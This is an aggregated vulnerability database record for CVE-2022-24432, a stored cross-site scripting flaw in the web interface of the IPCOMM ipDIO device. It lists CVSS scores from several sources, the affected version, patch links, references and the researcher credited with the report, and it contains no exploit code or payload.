Details of VAR-202203-0225

ID

VAR-202203-0225

CVE

CVE-2022-24432

TITLE

IPCOMM ipDIO Cross-Site Scripting Vulnerability

Trust: 1.2

sources: CNVD: CNVD-2022-20536 // CNNVD: CNNVD-202203-184

DESCRIPTION

Persistent cross-site scripting (XSS) in the web interface of ipDIO allows an authenticated remote attacker to introduce arbitrary JavaScript by injecting an XSS payload into specific fields. The XSS payload will be executed when a legitimate user attempts to upload, copy, download, or delete an existing configuration (Administrative Services). ipDIO Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. IPCOMM ipDIO is a remote control communication device of German IPCOMM company. Used to record digital and analog inputs and control digital outputs

Trust: 2.16

sources: NVD: CVE-2022-24432 // JVNDB: JVNDB-2021-011016 // CNVD: CNVD-2022-20536

IOT TAXONOMY

category:

['IoT']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2022-20536

AFFECTED PRODUCTS

vendor:	ipcomm	model:	ipdio	scope:	eq	version:	3.9	Trust: 1.6
vendor:	ipcomm	model:	ipdio	scope:	-	version:	-	Trust: 0.8
vendor:	ipcomm	model:	ipdio	scope:	eq	version:	-	Trust: 0.8
vendor:	ipcomm	model:	ipdio	scope:	eq	version:	ipdio firmware	Trust: 0.8

sources: CNVD: CNVD-2022-20536 // JVNDB: JVNDB-2021-011016 // NVD: CVE-2022-24432

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2022-24432
value:	MEDIUM
Trust: 1.0
ics-cert@hq.dhs.gov:	CVE-2022-24432
value:	MEDIUM
Trust: 1.0
NVD:	CVE-2022-24432
value:	MEDIUM
Trust: 0.8
CNVD:	CNVD-2022-20536
value:	LOW
Trust: 0.6
CNNVD:	CNNVD-202203-184
value:	MEDIUM
Trust: 0.6

nvd@nist.gov:	CVE-2022-24432
severity:	LOW
baseScore:	3.5
vectorString:	AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	SINGLE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	6.8
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
CNVD:	CNVD-2022-20536
severity:	LOW
baseScore:	3.5
vectorString:	AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	SINGLE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	6.8
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6

nvd@nist.gov:	CVE-2022-24432
baseSeverity:	MEDIUM
baseScore:	5.4
vectorString:	CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	LOW
userInteraction:	REQUIRED
scope:	CHANGED
confidentialityImpact:	LOW
integrityImpact:	LOW
availabilityImpact:	NONE
exploitabilityScore:	2.3
impactScore:	2.7
version:	3.1
Trust: 1.0
ics-cert@hq.dhs.gov:	CVE-2022-24432
baseSeverity:	MEDIUM
baseScore:	5.5
vectorString:	CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	LOW
userInteraction:	REQUIRED
scope:	UNCHANGED
confidentialityImpact:	LOW
integrityImpact:	LOW
availabilityImpact:	LOW
exploitabilityScore:	2.1
impactScore:	3.4
version:	3.1
Trust: 1.0
NVD:	CVE-2022-24432
baseSeverity:	MEDIUM
baseScore:	5.4
vectorString:	CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	LOW
userInteraction:	REQUIRED
scope:	CHANGED
confidentialityImpact:	LOW
integrityImpact:	LOW
availabilityImpact:	NONE
exploitabilityScore:	NONE
impactScore:	NONE
version:	3.0
Trust: 0.8

sources: CNVD: CNVD-2022-20536 // JVNDB: JVNDB-2021-011016 // CNNVD: CNNVD-202203-184 // NVD: CVE-2022-24432 // NVD: CVE-2022-24432

PROBLEMTYPE DATA

problemtype:	CWE-79	Trust: 1.0
problemtype:	Cross-site scripting (CWE-79) [NVD evaluation ]	Trust: 0.8

sources: JVNDB: JVNDB-2021-011016 // NVD: CVE-2022-24432

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202203-184

TYPE

XSS

Trust: 0.6

sources: CNNVD: CNNVD-202203-184

PATCH

title:	ipDIO	url:	https://www.ipcomm.de/product/ipDIO/en/sheet.html	Trust: 0.8
title:	Patch for IPCOMM ipDIO Cross-Site Scripting Vulnerability	url:	https://www.cnvd.org.cn/patchInfo/show/326476	Trust: 0.6
title:	IPCOMM ipDIO Fixes for cross-site scripting vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=184600	Trust: 0.6

sources: CNVD: CNVD-2022-20536 // JVNDB: JVNDB-2021-011016 // CNNVD: CNNVD-202203-184

EXTERNAL IDS

db:	NVD	id:	CVE-2022-24432	Trust: 3.8
db:	ICS CERT	id:	ICSA-22-062-01	Trust: 2.4
db:	JVN	id:	JVNVU91136750	Trust: 0.8
db:	JVNDB	id:	JVNDB-2021-011016	Trust: 0.8
db:	CNVD	id:	CNVD-2022-20536	Trust: 0.6
db:	CS-HELP	id:	SB2022030402	Trust: 0.6
db:	CNNVD	id:	CNNVD-202203-184	Trust: 0.6

sources: CNVD: CNVD-2022-20536 // JVNDB: JVNDB-2021-011016 // CNNVD: CNNVD-202203-184 // NVD: CVE-2022-24432

REFERENCES

url:	https://www.cisa.gov/uscert/ics/advisories/icsa-22-062-01	Trust: 2.4
url:	https://nvd.nist.gov/vuln/detail/cve-2022-24432	Trust: 1.4
url:	https://jvn.jp/vu/jvnvu91136750/	Trust: 0.8
url:	https://cxsecurity.com/cveshow/cve-2022-24432/	Trust: 0.6
url:	https://us-cert.cisa.gov/ics/advisories/icsa-22-062-01	Trust: 0.6
url:	https://www.cybersecurity-help.cz/vdb/sb2022030402	Trust: 0.6

sources: CNVD: CNVD-2022-20536 // JVNDB: JVNDB-2021-011016 // CNNVD: CNNVD-202203-184 // NVD: CVE-2022-24432

CREDITS

Aarón Flecha Menéndez of S21Sec reported these vulnerabilities to CISA.

Trust: 0.6

sources: CNNVD: CNNVD-202203-184

SOURCES

db:	CNVD	id:	CNVD-2022-20536
db:	JVNDB	id:	JVNDB-2021-011016
db:	CNNVD	id:	CNNVD-202203-184
db:	NVD	id:	CVE-2022-24432

LAST UPDATE DATE

2024-11-23T22:15:55.520000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2022-20536	date:	2022-03-18T00:00:00
db:	JVNDB	id:	JVNDB-2021-011016	date:	2022-07-14T07:36:00
db:	CNNVD	id:	CNNVD-202203-184	date:	2022-03-17T00:00:00
db:	NVD	id:	CVE-2022-24432	date:	2024-11-21T06:50:24.570

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2022-20536	date:	2022-03-17T00:00:00
db:	JVNDB	id:	JVNDB-2021-011016	date:	2022-07-14T00:00:00
db:	CNNVD	id:	CNNVD-202203-184	date:	2022-03-03T00:00:00
db:	NVD	id:	CVE-2022-24432	date:	2022-03-10T17:46:13.957